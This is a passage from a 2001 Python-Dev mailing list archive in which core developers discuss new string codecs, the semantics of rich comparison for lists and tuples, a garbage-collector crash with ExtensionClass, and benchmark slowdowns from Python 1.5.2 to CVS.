11:34:40 +0200 Subject: [Python-Dev] Comparison speed References: Message-ID: <3B0249B0.5DD10A4C@lemburg.com> Tim Peters wrote: > > [Martin] > > Producing numbers is easy :-) > > If only making sense of them were too <0.6 wink>. FYI, I've added a few compare tests to pybench which now is available as version 0.9. You can download it from my Python page. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh at python.net Wed May 16 12:53:16 2001 From: mwh at python.net (Michael Hudson) Date: 16 May 2001 11:53:16 +0100 Subject: [Python-Dev] Easy codec access In-Reply-To: Guido van Rossum's message of "Tue, 15 May 2001 11:35:09 -0500" References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> Message-ID: Guido van Rossum writes: > > I've just checked in a set of patches which implement the new > > .decode() method along with a couple of useful codecs. > > Cool! Indeed. Good idea, Marc! This is a bit unfriendly though: >>> "bobbins".encode("gzip") Traceback (most recent call last): File "", line 1, in ? File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function raise SystemError,\ SystemError: module "encodings.gzip" failed to register I thought SystemErrors shouldn't ever happen (isn't it what gets raised for an illegal opcode, for example?). > > To see just how easy it is to write codecs, please have > > a look at the string codecs I added in this patch (e.g. > > zlib_codec.py or hex_codec.py). I am pretty sure that there > > are a lot more useful things in the standard lib which could > > benefit from these easy-to-use interfaces. > > As an excercise, I added a quoted-printable codec. It was easy > indeed! urlencode would be nice. Maybe re.escape, too. html entities? That's probably a bigger can of worms, but print "

%s

"%text.encode("html") seems delightfully simpleminded. Cheers, M. -- GAG: I think this is perfectly normal behaviour for a Vogon. ... VOGON: That is exactly what you always say. GAG: Well, I think that is probably perfectly normal behaviour for a psychiatrist. -- The Hitch-Hikers Guide to the Galaxy, Episode 9 From mal at lemburg.com Wed May 16 13:06:14 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 13:06:14 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> Message-ID: <3B025F26.A625DE02@lemburg.com> Michael Hudson wrote: > > Guido van Rossum writes: > > > > I've just checked in a set of patches which implement the new > > > .decode() method along with a couple of useful codecs. > > > > Cool! > > Indeed. Good idea, Marc! Thanks :-) > This is a bit unfriendly though: > > >>> "bobbins".encode("gzip") > Traceback (most recent call last): > File "", line 1, in ? > File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function > raise SystemError,\ > SystemError: module "encodings.gzip" failed to register > > I thought SystemErrors shouldn't ever happen (isn't it what gets > raised for an illegal opcode, for example?). This is due to the zlib module not being installed. The reason for the search function in encodings/__init__.py raising a SystemError is that it did find a module named gzip, but this module does not export the needed registration API getregentry(). Perhaps it should just raise a LookupError instead, though... > > > To see just how easy it is to write codecs, please have > > > a look at the string codecs I added in this patch (e.g. > > > zlib_codec.py or hex_codec.py). I am pretty sure that there > > > are a lot more useful things in the standard lib which could > > > benefit from these easy-to-use interfaces. > > > > As an excercise, I added a quoted-printable codec. It was easy > > indeed! > > urlencode would be nice. Maybe re.escape, too. html entities? > That's probably a bigger can of worms, but > > print "

%s

"%text.encode("html") > > seems delightfully simpleminded. Right. That's the idea... volunteers are welcome :-) There are lots of those little "escape this, encode that" tasks which could benefit from the codec machinery. The ones you mention would certainly be good candidates. pickle and marshal would also be a good to have wrapped as codecs. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh at python.net Wed May 16 13:19:15 2001 From: mwh at python.net (Michael Hudson) Date: 16 May 2001 12:19:15 +0100 Subject: [Python-Dev] Easy codec access In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 16 May 2001 13:06:14 +0200" References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > > This is a bit unfriendly though: > > > > >>> "bobbins".encode("gzip") > > Traceback (most recent call last): > > File "", line 1, in ? > > File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function > > raise SystemError,\ > > SystemError: module "encodings.gzip" failed to register > > > > I thought SystemErrors shouldn't ever happen (isn't it what gets > > raised for an illegal opcode, for example?). > > This is due to the zlib module not being installed. No it's not, actually. I *thought* I was getting the error message because the zlib encoding doesn't alias itself to gzip (whether it should or not is another question). But in fact if you specify a bogus encoding you get a nice error message: >>> "bobbins".encode("nonesuch") Traceback (most recent call last): File "", line 1, in ? LookupError: unknown encoding but: >>> "bobbins".encode("sys") Traceback (most recent call last): File "", line 1, in ? File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function raise SystemError,\ SystemError: module "encodings.sys" failed to register I have to admit I don't really know what's going on here, but the error is just confusing. > The reason for the search function in encodings/__init__.py raising > a SystemError is that it did find a module named gzip, but this > module does not export the needed registration API getregentry(). Yep. > Perhaps it should just raise a LookupError instead, though... Might be easiest. > > urlencode would be nice. Maybe re.escape, too. html entities? > > That's probably a bigger can of worms, but > > > > print "

%s

"%text.encode("html") > > > > seems delightfully simpleminded. > > Right. That's the idea... volunteers are welcome :-) Maybe this evening. > There are lots of those little "escape this, encode that" tasks > which could benefit from the codec machinery. The ones you > mention would certainly be good candidates. pickle and marshal > would also be a good to have wrapped as codecs. Ooh yes, hadn't thought of them. 'YW5vdGhlci1mdW4tdG95\n'.decode("base64")-ly y'rs M. -- There's an aura of unholy black magic about CLISP. It works, but I have no idea how it does it. I suspect there's a goat involved somewhere. -- Johann Hibschman, comp.lang.scheme From aahz at rahul.net Wed May 16 15:16:18 2001 From: aahz at rahul.net (Aahz Maruch) Date: Wed, 16 May 2001 06:16:18 -0700 (PDT) Subject: [Python-Dev] Comparison speed In-Reply-To: <20010515222738.A9996@thyrsus.com> from "Eric S. Raymond" at May 15, 2001 10:27:38 PM Message-ID: <20010516131618.C40CC99C91@waltz.rahul.net> Eric S. Raymond wrote: > > (Yes, I know some sexy lady Pythonistas. No, you can't have their > phone numbers. Pthfthfthpht...) That's okay, I have their e-mail addresses. Wanna bet on which of us gets a response first? -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From barry at digicool.com Wed May 16 15:42:15 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 16 May 2001 09:42:15 -0400 Subject: [Python-Dev] Comparison speed References: <15105.46090.203278.397835@anthem.wooz.org> Message-ID: <15106.33719.14403.13051@anthem.wooz.org> >>>>> "TP" == Tim Peters writes: TP> Random clue: when you're too lazy to try to subtact out loop TP> overhead (not a knock, I am too), you may have better luck TP> with TP> r = [1] * 1000000 TP> than TP> r = range(1000000) Ah, good point! From guido at digicool.com Wed May 16 17:01:40 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 16 May 2001 10:01:40 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Wed, 16 May 2001 09:28:45 +0200." <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> Message-ID: <200105161501.KAA02226@cj20424-a.reston1.va.home.com> > Marc-Andre once proposed a type representing the immediate supertype > of both byte strings and unicode strings; let's call it abstract string. > Then I could write isinstance(e, types.AbstractString). This will probably be doable in 2.2. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 16 17:24:55 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 16 May 2001 10:24:55 -0500 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: Your message of "Tue, 15 May 2001 20:01:05 -0400." References: Message-ID: <200105161524.KAA02518@cj20424-a.reston1.va.home.com> > The question remaining is how much of this list/tuple richcmp behavior is > guaranteed by the language and how much is just implementation-dependent > fuzz. Unclear what you're asking. The language doesn't require any particular semantics for sequence comparisons, but the language of course includes the tuple and list squence types, and it describes (albeing lacking some rigorous detail) what comparisons for those do. If there are specific lacks of detail, it probably helps to think about filling those in. > For a more vanilla example, I removed the EQ/NE "lengths differ?" > tuple richcmp early-exit test because I never found code that made > it trigger. (but tons of code that gets there without triggering). > But this has semantic implications too: an implementation without > the early exit may call user-defined comparison routines that raise > exceptions when comparing tuples of different lengths now. Do you > care? (I don't.) I don't care about exceptions either in this case; the shortcut seems fair game. --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Wed May 16 16:28:04 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 16 May 2001 09:28:04 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: <3B025F26.A625DE02@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> Message-ID: <15106.36468.62292.611515@beluga.mojam.com> mal> pickle and marshal would also be a good to have wrapped as codecs. Why? They operate on much more than strings. -- Skip Montanaro (skip at pobox.com) (847)971-7098 From fredrik at effbot.org Wed May 16 17:07:18 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 16 May 2001 17:07:18 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> Message-ID: <002101c0de19$e7875a90$e46940d5@hagrid> skip wrote: > mal> pickle and marshal would also be a good to have wrapped as codecs. > > Why? They operate on much more than strings. hypergeneralization, of course. more candidates: "10".decode("int") "10.0".decode("float") "[1, 2, 3]".decode("list") "readme.txt".decode("file") "SyntaxError".decode("raise") (etc) Cheers /F From nas at python.ca Wed May 16 18:19:42 2001 From: nas at python.ca (Neil Schemenauer) Date: Wed, 16 May 2001 09:19:42 -0700 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 14, 2001 at 09:40:21PM +0200 References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> Message-ID: <20010516091942.A16455@glacier.fnational.com> Martin v. Loewis wrote: > In any case, I think you need to analyse this in a debugger. #7 0x080bc17e in tupletraverse (o=0x8154914, visit=0x807d640 , arg=0x0) at ../Objects/tupleobject.c:366 366 err = visit(x, arg); (gdb) p *o $11 = {ob_refcnt = 1, ob_type = 0x80eb5a0, ob_size = 1, ob_item = {0x402c5180}} (gdb) p *o->ob_item[0] $12 = {ob_refcnt = 2, ob_type = 0x0} In other words the GC is finding a tuple object that contains an element with a funny looking address (data segment?) and an op_type of NULL. The collector has started running from here: #10 0x0807debc in collect_generations () at ../Modules/gcmodule.c:467 #11 0x0807dfc4 in _PyGC_Insert (op=0x819f57c) at ../Modules/gcmodule.c:507 #12 0x080af56a in PyDict_New () at ../Objects/dictobject.c:149 #13 0x0808d8b8 in getBaseDictionary (type=0x402bcc40) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1249 #14 0x0808eb45 in initializeBaseExtensionClass (self=0x402bcc40) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1495 #15 0x08095fb1 in export_subclassed_type (dict=0x81851fc, name=0x402a9388 "GdkDragContext", typ=0x402bcc40, bases=0x816fc34) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:3451 #16 0x400194ac in pygobject_register_class (dict=0x81851fc, class_name=0x402a9388 "GdkDragContext", get_type=0x404d5c50 , ec=0x402bcc40, bases=0x816fc34) at gobjectmodule.c:202 #17 0x402a55fd in pygtk_register_classes (d=0x81851fc) at gtk.c:31844 #18 0x40257004 in init_gtk () at gtkmodule.c:98 I don't have time to dig deeper into this right now but perhaps this will help someone. Neil From mal at lemburg.com Wed May 16 18:24:57 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 18:24:57 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid> Message-ID: <3B02A9D9.113836D6@lemburg.com> Fredrik Lundh wrote: > > skip wrote: > > > mal> pickle and marshal would also be a good to have wrapped as codecs. > > > > Why? They operate on much more than strings. Of course. Still their basic task is to take an object and encode in some way for dumps() and do the reverse for loads(). That's pretty much what codecs normally do ;-) I wasn't referring to the use of pickle and marshal with string.encode() and .decode(); even though you could then decode a pickle using "pickledata".decode("pickle") and get back the object. These two are very useful though when it comes to using codecs for file wrappers: f = codecs.open('mypicklfile', mode='wb', encoding='pickle') f.write((123, 'abc', 456.789)) f.close() f = codecs.open('mypicklfile', mode='rb', encoding='pickle') t = f.read() f.close() > hypergeneralization, of course. > > more candidates: > > "10".decode("int") > "10.0".decode("float") > "[1, 2, 3]".decode("list") > "readme.txt".decode("file") > "SyntaxError".decode("raise") > (etc) You forgot the most important one ;-) ... "print 'My first Python program'".decode("python").run() -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From skip at pobox.com Wed May 16 19:44:15 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 16 May 2001 12:44:15 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: <3B02A9D9.113836D6@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid> <3B02A9D9.113836D6@lemburg.com> Message-ID: <15106.48239.813965.579600@beluga.mojam.com> mal> Still their basic task is to take an object and encode in some way mal> for dumps() and do the reverse for loads(). That's pretty much mal> what codecs normally do ;-) Yes, I see that. The conceptual problem I have is that in all previous examples I've seen here they have taken as input and returned as outputs only strings or unicode objects. mal> These two are very useful though when it comes to using codecs mal> for file wrappers: This use I missed. Thanks for the explanation. Skip From mal at lemburg.com Wed May 16 20:33:44 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 20:33:44 +0200 Subject: [Python-Dev] Performance compares Message-ID: <3B02C808.E3354D3F@lemburg.com> After having read a little into the comparison thread, I tried some performance compares on my own: the one between the current CVS version and Python 1.5.2. Both versions were compiled on the same Linux machine, using the same GCC compiler and optimization settings. Here are the results from pybench 0.9 and pystone; some of the figures show quite dramatic slow-downs. I'm not sure where they result from, but they do concern me a bit, since the upgrade path from 1.5.2 is probably the most common one to be expected in user-land. Since it is possible that these figures result from my specific machine setup, I'd like to know what other people see on their machines. Thanks. -- Python 1.5.2: Pystone(1.1) time for 10000 passes = 3.26 This machine benchmarks at 3067.48 pystones/second Python CVS: Pystone(1.1) time for 10000 passes = 4.43 This machine benchmarks at 2257.34 pystones/second -- PYBENCH 0.9 Benchmark: /home/lemburg/tmp/pybench-cvs-O.pyb (rounds=10, warp=20) Tests: per run per oper. diff *) ------------------------------------------------------------------------ BuiltinFunctionCalls: 1152.60 ms 9.04 us +64.70% BuiltinMethodLookup: 903.90 ms 1.72 us CompareFloats: 908.30 ms 2.02 us +40.94% CompareFloatsIntegers: 1276.25 ms 2.84 us +37.15% CompareIntegers: 1075.50 ms 1.19 us +21.09% CompareLongs: 989.40 ms 2.20 us +47.12% CompareStrings: 844.80 ms 2.25 us +33.99% CompareUnicode: 1018.65 ms 2.72 us n/a ConcatStrings: 1226.30 ms 8.18 us +92.56% ConcatUnicode: 1575.40 ms 10.50 us n/a CreateInstances: 2094.05 ms 49.86 us +101.86% CreateStringsWithConcat: 1515.75 ms 7.58 us +111.67% CreateUnicodeWithConcat: 1833.85 ms 9.17 us n/a DictCreation: 2795.30 ms 18.64 us +203.34% DictWithFloatKeys: 2285.70 ms 3.81 us +18.73% DictWithIntegerKeys: 1444.65 ms 2.41 us +58.53% DictWithStringKeys: 1262.60 ms 2.10 us +52.83% ForLoops: 989.95 ms 99.00 us -10.01% IfThenElse: 1232.45 ms 1.83 us +23.25% ListSlicing: 621.40 ms 177.54 us NestedForLoops: 986.60 ms 2.82 us +52.09% NormalClassAttribute: 1231.15 ms 2.05 us +36.70% NormalInstanceAttribute: 1114.15 ms 1.86 us +27.11% PythonFunctionCalls: 1251.25 ms 7.58 us +46.09% PythonMethodCalls: 1034.35 ms 13.79 us +42.19% Recursion: 922.15 ms 73.77 us +36.76% SecondImport: 1055.45 ms 42.22 us +100.47% SecondPackageImport: 1061.35 ms 42.45 us +96.31% SecondSubmoduleImport: 1292.35 ms 51.69 us +77.89% SimpleComplexArithmetic: 1748.00 ms 7.95 us +120.97% SimpleDictManipulation: 1172.85 ms 3.91 us +47.85% SimpleFloatArithmetic: 881.25 ms 1.60 us +12.30% SimpleIntFloatArithmetic: 833.80 ms 1.26 us SimpleIntegerArithmetic: 839.00 ms 1.27 us SimpleListManipulation: 1252.60 ms 4.64 us +69.37% SimpleLongArithmetic: 1360.65 ms 8.25 us +100.43% SmallLists: 2380.05 ms 9.33 us +116.72% SmallTuples: 1793.80 ms 7.47 us +101.52% SpecialClassAttribute: 1257.35 ms 2.10 us +37.91% SpecialInstanceAttribute: 1340.25 ms 2.23 us +21.13% StringMappings: 1601.50 ms 12.71 us n/a StringPredicates: 1059.70 ms 3.78 us n/a StringSlicing: 1235.90 ms 7.06 us +98.32% TryExcept: 1272.55 ms 0.85 us +28.39% TryRaiseExcept: 1383.45 ms 92.23 us +77.48% TupleSlicing: 1163.05 ms 11.08 us +75.29% UnicodeMappings: 1232.80 ms 68.49 us n/a UnicodePredicates: 1294.95 ms 5.76 us n/a UnicodeProperties: 1410.45 ms 7.05 us n/a UnicodeSlicing: 1296.80 ms 7.41 us n/a ------------------------------------------------------------------------ Average round time: 73388.00 ms n/a *) measured against: /home/lemburg/tmp/pybench-1.5.2-O.pyb (rounds=10, warp=20) (The compares not shown are below noise level (+-10%)) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Wed May 16 21:07:49 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 15:07:49 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: <200105161524.KAA02518@cj20424-a.reston1.va.home.com> Message-ID: [Tim] > The question remaining is how much of this list/tuple richcmp behavior is > guaranteed by the language and how much is just implementation-dependent > fuzz. [Guido] > Unclear what you're asking. The language doesn't require any > particular semantics for sequence comparisons, but the language of > course includes the tuple and list squence types, and it describes > (albeing lacking some rigorous detail) what comparisons for those do. The current Tuples and lists are compared lexicographically using comparison of corresponding items. was quite clear in a cmp-only world. In a richcmp world, "compared lexicographically" is fuzzy enough that different implementations may do different things in good faith, competent users may disagree about what it means in specific cases, and programs may yield different results across implementations (or random CVS patches ). > If there are specific lacks of detail, it probably helps to think > about filling those in. The *level* of additional detail intended is the cutoff between what's guaranteed by the language and what's left up to the implementation. The full truth before was relatively simple. For a pair x, y of lists or tuples, def __cmp__(x, y): # pretending this is a method on lists and tuples i = 0 while i < len(x) and i < len(y): c = cmp(x[i], y[i]) if c: return c i += 1 return cmp(len(x), len(y)) was *almost* the entire tale, incl. that lengths were re-fetched on each iteration. What's left unexplained is the treatment of recursive lists, and so the result of comparing them is a prime suspect for different behavior across implementations and releases. In a richcmp world, there are several additional ways in which the above fails to capture the full truth, and each of those ways is another prime suspect for surprises. For example, I believe it's *intended* that: 1. Element comparisons continue to be strictly left-to-right, and that no element comparisons are to be performed after the leftmost element comparison that settles the issue (if any). 2. tuple/list comparison via == or != must use only == comparison on elements, and that implementations are allowed (but not required) to skip all element comparisons when == or != comparison is given lists/tuples of different sizes. OTOH, I doubt (but don't know) it's intended that all implementations must emulate other semantically significant details of the current implementation, like: 1. <=, <, > and >= comparisons will do at most one element comparison that is not an == comparison. 2. Whenever a <, <=, > or >= element comparison is needed, the long- winded details of how that works, incl. but not limited to the specific "first try ==, then try <, then try >" strategy used to simulate a pre-richcmp cmp() when all else fails. Going back to the original example: >>> class C: ... def __lt__(x, y): return 1 ... __eq__ = __lt__ ... >>> a, b = C(), C() >>> a < b #1 1 >>> [a] < [b] #2 0 >>> cmp(a, b) #3 0 >>> a > b #4 1 >>> a == b #5 1 >>> a != b #6 1 >>> Which of those results are *required* by the language, and which merely *allowed*? + I believe #1, #4 and #5 are required. + I have no idea whether to call it "a bug" if the #2 and/or #3 and/or #6 results differed, e.g., under Jython, or under CPython 2.3. Indeed, I'm not even sure why #6 returns 1 under CPython today, and I've been staring at this a lot lately ... OK, #6 ends up getting resolved by comparing object addresses, which leaves "required or not?" fuzzy (i.e., *must* it be resolved that way? or is it implementation-defined?). From guido at digicool.com Wed May 16 22:35:46 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 16 May 2001 15:35:46 -0500 Subject: [Python-Dev] Rich comparison of lists and tuples In-Reply-To: Your message of "Wed, 16 May 2001 15:07:49 -0400." References: Message-ID: <200105162035.PAA04299@cj20424-a.reston1.va.home.com> [Subject fixed] [Tim shows there's a lot left to the imagination when trying to glean the meaning of list1==list2 using rich comparisons.] I would like to break this down by defining the mapping between cmp() and rich comparisons. I propose: - If cmp() is requested but not defined, and rich comparisons are defined, try ==, <, > in order; if all three yield false, act as if rich comparisons were not defined, and use the fallback comparison (i.e. by address). - If a rich comparison is requested but not defined, use cmp() and use the obvious mapping. - Continue to define the comparison of unequal sequences in terms of cmp(). - Testing == or != for sequences takes these shortcuts: 1. if the lengths differ, the sequences differ 2. compare the elements using == until a false return is found Note that this defines 'x!=y' as 'not x==y' for sequences. We could easily go the extra mile and define != to use only != on the items; but is this worth the extra complexity? --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Wed May 16 22:37:43 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 16 May 2001 15:37:43 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <20010516091942.A16455@glacier.fnational.com> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> <20010516091942.A16455@glacier.fnational.com> Message-ID: <15106.58647.495143.164636@beluga.mojam.com> Neil> In other words the GC is finding a tuple object that contains an Neil> element with a funny looking address (data segment?) and an Neil> op_type of NULL. Neil, I'm not sure if the funny looking address is a red herring or the key to the crime. I tried running with a breakpoint set in getBaseDictionary. The first couple times, the type parameter looked like $26 = (PyExtensionClass *) 0x80e7f60 $27 = {ob_refcnt = 2, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x80d7138 "ExtensionClass", ...} $28 = (PyExtensionClass *) 0x80e8060 $29 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x80d7209 "Base", ...} The third time it looked like $30 = (PyExtensionClass *) 0x4019f120 $31 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x4019dab2 "GObject", ...} The difference between the first two calls and the third one is that the first two objects are defined in ExtensionClass.o, which I currently statically link into the interpreter. The Gtk/GObject stuff is dynamically loaded into the running executable, so it's not surprising that it winds up at a wildly different address than the ExtensionClass stuff. My current best guess is that whatever object the tuple is referring to is declared static in the dynamically loaded Gtk stuff and has no business getting reclaimed by the collector. Sounds like a missing Py_INCREF somewhere. At the earliest point I've been able to check that object so far, its ob_type field is NULL. Skip From cpr at emsoftware.com Thu May 17 00:24:15 2001 From: cpr at emsoftware.com (Chris Ryland) Date: Wed, 16 May 2001 18:24:15 -0400 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online Message-ID: <00f201c0de57$03042c20$6901a8c0@EM2> This talk is most entertaining! Highly recommended to you good folk, if only as a reinforcement of the good design principles embodied in Python (with the exception of print >> ;-). Jonathan Rees (an old Scheme/T hand) kept referring to Python whenever he wanted to give an example of a modern dynamic language (disclaiming a lot of knowledge about it). He mentioned it three or four times (usually positively), so it must be on the tip of his mind. -- Cheers! Chris Ryland Em Software, Inc. www.emsoftware.com From greg at cosc.canterbury.ac.nz Thu May 17 03:49:31 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 17 May 2001 13:49:31 +1200 (NZST) Subject: [Python-Dev] Easy codec access In-Reply-To: <3B02A9D9.113836D6@lemburg.com> Message-ID: <200105170149.NAA18480@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > You forgot the most important one ;-) ... > > "print 'My first Python program'".decode("python").run() Surely that should be: "'My first Python program'.encode('stdout')".decode("python").decode("run") Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From tim.one at home.com Thu May 17 03:56:56 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 21:56:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > I'll put a patch on SF soon which does what you want to do, i.e. tries > tp_compare as the first thing if tp_richcompare is not there. Thanks! I'll check it out. > Even with this patch, your code is faster if strings have a > richcompare. OK, from what I understand, that makes no sense. Does it to you? Assuming you're still talking about my silly little "ab" < "cd" test, then all the new code you put into your richcompare slot was a waste of cycles for that specific case: the new richcmp "objects the same type?" test would fail, then the new "pointers equal?" test would fail, then the new "op == Py_EQ?" test would fail, and then richcompare would give up and call string_compare() anyway. So I'm either missing something fundamental about what you did, or it's a timing anomaly on your box that defies obvious explanation ("but if I add three new tests that don't pay off, and make an extra call, then it's faster!"). > Without richcompare, I get > > 0.720 > 0.720 > 0.720 > 0.730 > 0.720 > 0.720 > 0.730 > 0.720 > 0.720 > 0.730 > > With it, I get > > 0.710 > 0.720 > 0.720 > 0.710 > 0.710 > 0.720 > 0.710 > 0.710 > 0.710 > 0.720 See above. > Given that stock CVS python is in the 0.78 range, the different is > neglectable, though. Oh, I don't like giving up that easy on things that make no sense -- something else is happening here, although I've no idea what. From tim.one at home.com Thu May 17 04:17:37 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 22:17:37 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B02C808.E3354D3F@lemburg.com> Message-ID: [MAL] > Since it is possible that these figures result from my specific > machine setup, I'd like to know what other people see on their > machines. Is this the same machine where you were able to get 15% difference a few years ago by adding or removing an unreachable printf in ceval.c (or was that Vladimir)? If so, I bet it's degenerated to random 50% difference since then . My Win98SE box is *astonishingly* useless for timings. Without fail, the first time I run pystone after a reboot yields a result a solid 50% higher than the second or subsequent times I run it (yes, it's major-league *slower* the second time). This is true across dozens of trials over several months, and across all versions of Python. And simple little loops routinely vary in reported runtime by a factor of 3. I may have to dig my old Win95 box out of the packing crate <0.6 wink>. None of that changes, of course, that the numbers you got are scary. From jeremy at digicool.com Thu May 17 00:37:47 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Wed, 16 May 2001 18:37:47 -0400 (EDT) Subject: [Python-Dev] Performance compares In-Reply-To: <3B02C808.E3354D3F@lemburg.com> References: <3B02C808.E3354D3F@lemburg.com> Message-ID: <15107.315.19349.268345@slothrop.digicool.com> As usual, the results you're reporting are quite different than what I see on my machine. I'd like to think that my machine is more normal than yours, but I expect we're both oddballs <0.2 wink>. I see basically the same slowdowns that you see, but the amount of the slowdown is quite a bit smaller. I compared current CVS with 1.5.2, both compiled with GCC 2.95.3 and the -O3 flag; ran pybench of an 800MHz P3 with 256MB RAM running Linux 2.2.17. Python 1.5.2: Pystone(1.1) time for 10000 passes = 0.85 This machine benchmarks at 11764.7 pystones/second Python CVS: Pystone(1.1) time for 10000 passes = 0.94 This machine benchmarks at 10638.3 pystones/second PYBENCH 0.9 Benchmark: cvs (rounds=10, warp=100) Tests: per run per oper. diff * ------------------------------------------------------------------------ BuiltinFunctionCalls: 41.85 ms 1.64 us +31.40% CompareFloats: 39.60 ms 0.44 us +13.96% CompareFloatsIntegers: CompareIntegers: CompareLongs: 39.85 ms 0.44 us +15.01% CompareStrings: CompareUnicode: ConcatStrings: 48.65 ms 1.62 us +46.76% ConcatUnicode: CreateInstances: 75.75 ms 9.02 us +55.54% CreateStringsWithConcat: 51.60 ms 1.29 us +62.78% CreateUnicodeWithConcat: DictCreation: 87.80 ms 2.93 us +115.72% DictWithFloatKeys: DictWithIntegerKeys: DictWithStringKeys: ForLoops: 63.85 ms 31.93 us -13.60% IfThenElse: ListSlicing: NestedForLoops: 32.95 ms 0.66 us +10.39% NormalClassAttribute: NormalInstanceAttribute: PythonFunctionCalls: 48.85 ms 1.48 us +11.78% PythonMethodCalls: 38.95 ms 2.60 us +12.09% Recursion: SecondImport: 37.80 ms 